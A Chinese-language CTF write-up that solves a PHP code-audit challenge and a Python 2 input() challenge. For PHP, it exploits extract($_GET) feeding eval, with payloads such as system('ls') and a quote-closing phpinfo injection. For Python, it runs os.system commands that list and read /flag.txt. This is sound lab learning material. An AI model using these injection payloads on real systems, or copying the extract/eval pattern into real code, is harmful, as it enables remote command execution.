Web 欢迎来到魔法世界
打开容器,即进行php代码审计
<?php
highlight_file('index.php');
extract($_GET);//将GET方式传递的参数赋值
error_reporting(0);
function String2Array($data)//eval那里存在命令执行
{
if($data == '') return array();
@eval("\$array = $data;");
return $array;
}
if(is_array($attrid) && is_array($attrvalue))//需要传入的参数都是数组
{
//这段代码我总结是一个php代码闭合的过程
$attrstr .= 'array(';
$attrids = count($attrid);
for($i=0; $i<$attrids; $i++)
{
$attrstr .= '"'.intval($attrid[$i]).'"=>'.'"'.$attrvalue[$i].'"';
if($i < $attrids-1)
{
$attrstr .= ',';
}
}
$attrstr .= ');';
}
String2Array($attrstr);
我的解法
但是比赛的时候,我刚开始一直在想中间那一段代码需要怎么构造,才能够命令执行,审了好大会儿,然后忽然发现,如果下面这个判断不成立的话, 那么就不用进行构造了
f(is_array($attrid) && is_array($attrvalue))
而代码的开头有extract($_GET);
,可以直接进行赋值,所以我们可以直接传参attrstr
?attrstr=system('ls');
哈哈哈,回显表明方法可行,然后查看根目录/,发现有个flag.sh,价值不大。。。。。
查看phpinfo(),可以找到flag
?attrstr=phpinfo();
师傅的wp
之后和Cubestone师傅交流的时候,师傅用的比较正规的解法,学习一下
?attrid[]=1&attrvalue[]=");phpinfo();$a=("
有几个要注意的地方
- count()函数返回数组中元素的个数,那么attrid数组,传一个元素进去即可
$attrids = count($attrid);
- payload中的前两个参数是数组形式
- 需要闭合",payload中最后的$a=(“就是为了闭合”
Misc WELCOME DASCTFxJlenu
nc连接
nc node4.buuoj.cn 29020
然后利用python2的input漏洞(我把它和python的模板注入联系在一起了)
__import__('os').system('ls /')
发现flag.txt
__import__('os').system('cat /flag.txt')
得flag